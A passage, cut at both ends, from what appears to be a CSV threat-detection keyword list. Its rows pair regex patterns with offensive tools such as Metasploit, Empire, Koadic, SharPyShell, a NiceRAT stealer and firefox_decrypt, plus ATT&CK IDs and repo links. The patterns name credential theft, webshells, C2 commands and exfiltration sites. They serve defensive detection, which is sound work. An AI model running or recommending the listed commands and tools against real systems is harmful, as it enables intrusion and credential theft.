TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*UnlinkDLL.exe*",".{0,1000}UnlinkDLL\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*UnlinkDLL\Main.nim*",".{0,1000}UnlinkDLL\\Main\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - 
T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*UnlinkDLL\Structs.nim*",".{0,1000}UnlinkDLL\\Structs\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*UnlinkDLL-main*",".{0,1000}UnlinkDLL\-main.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*unmanagedPowershell */command*",".{0,1000}unmanagedPowershell\s.{0,1000}\/command.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*unmarshal_cmd_exec.*",".{0,1000}unmarshal_cmd_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*UnmarshalPwn.*",".{0,1000}UnmarshalPwn\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*UnmarshalPwn.exe*",".{0,1000}UnmarshalPwn\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*unode/firefox_decrypt*",".{0,1000}unode\/firefox_decrypt.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*Unpacking Successful!\n\nExecuting from Memory >>>> *",".{0,1000}Unpacking\sSuccessful!\\n\\nExecuting\sfrom\sMemory\s\>\>\>\>\s.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*UnquotedPath.csproj*",".{0,1000}UnquotedPath\.csproj.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*UnquotedPath.exe*",".{0,1000}UnquotedPath\.exe.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*unshackle --*",".{0,1000}unshackle\s\-\-.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*unshackle-main*",".{0,1000}unshackle\-main.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*unshackle-v1.0.iso*",".{0,1000}unshackle\-v1\.0\.iso.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*unshadow /etc/passwd*",".{0,1000}unshadow\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*unshadow passwd shadow*",".{0,1000}unshadow\spasswd\sshadow.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*untested_payloads.rb*",".{0,1000}untested_payloads\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*UnwindInspector.exe*",".{0,1000}UnwindInspector\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*unzip websites.zip -d sites > /dev/null*",".{0,1000}unzip\swebsites\.zip\s\-d\ssites\s\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*UP104D7060F113(*",".{0,1000}UP104D7060F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*UP104D70K3N(*",".{0,1000}UP104D70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*update_vba_file_url_droppingPath(*",".{0,1000}update_vba_file_url_droppingPath\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*Update-ExeFunctions*",".{0,1000}Update\-ExeFunctions.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*update-rc.d tor2web defaults*",".{0,1000}update\-rc\.d\stor2web\sdefaults.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Upload it to the target server and let\\'s start having some fun :) *",".{0,1000}Upload\sit\sto\sthe\starget\sserver\sand\slet\\\\\'s\sstart\shaving\ssome\sfun\s\:\)\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - 
T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*upload.nolog.cz*",".{0,1000}upload\.nolog\.cz.{0,1000}","offensive_tool_keyword","upload.nolog.cz","sharing platform","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://upload.nolog.cz/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*upload-dll * *.dll*",".{0,1000}upload\-dll\s.{0,1000}\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*UploadFileImplant*",".{0,1000}UploadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Uploading encrypted ps module.*",".{0,1000}Uploading\sencrypted\sps\smodule\..{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Uploading Juicy Potato binary*",".{0,1000}Uploading\sJuicy\sPotato\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Uploading malicious DLL via SMB*",".{0,1000}Uploading\smalicious\sDLL\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*Uploading malicious SCNotification.exe.config via SMB*",".{0,1000}Uploading\smalicious\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user 
sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*Uploading mimikatz binary*",".{0,1000}Uploading\smimikatz\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*UrbanBishop.exe*",".{0,1000}UrbanBishop\.exe.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Uri3n/Thread-Pool-Injection-PoC*",".{0,1000}Uri3n\/Thread\-Pool\-Injection\-PoC.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*URL must be provided for GIF embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sGIF\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*URL must be provided for PNG embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sPNG\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*ursnif_IcedID.profile*",".{0,1000}ursnif_IcedID\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*USBPcap*",".{0,1000}USBPcap.{0,1000}","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*use exploit/*",".{0,1000}use\sexploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*use exploit/windows/*",".{0,1000}use\sexploit\/windows\/.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use implant/*",".{0,1000}use\simplant\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*use incognito*",".{0,1000}use\sincognito.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Use nmap --script http-ntlm-info *",".{0,1000}Use\snmap\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use powershell_stageless*",".{0,1000}use\spowershell_stageless.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*use safetykatz*",".{0,1000}use\ssafetykatz.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*use scanner/smb/smb_enum_gpp*",".{0,1000}use\sscanner\/smb\/smb_enum_gpp.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use scanner/ssh/ssh_enumusers*",".{0,1000}use\sscanner\/ssh\/ssh_enumusers.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use stager/*",".{0,1000}use\sstager\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*UseBeaconCmd*",".{0,1000}UseBeaconCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*uselistener dbx*",".{0,1000}uselistener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 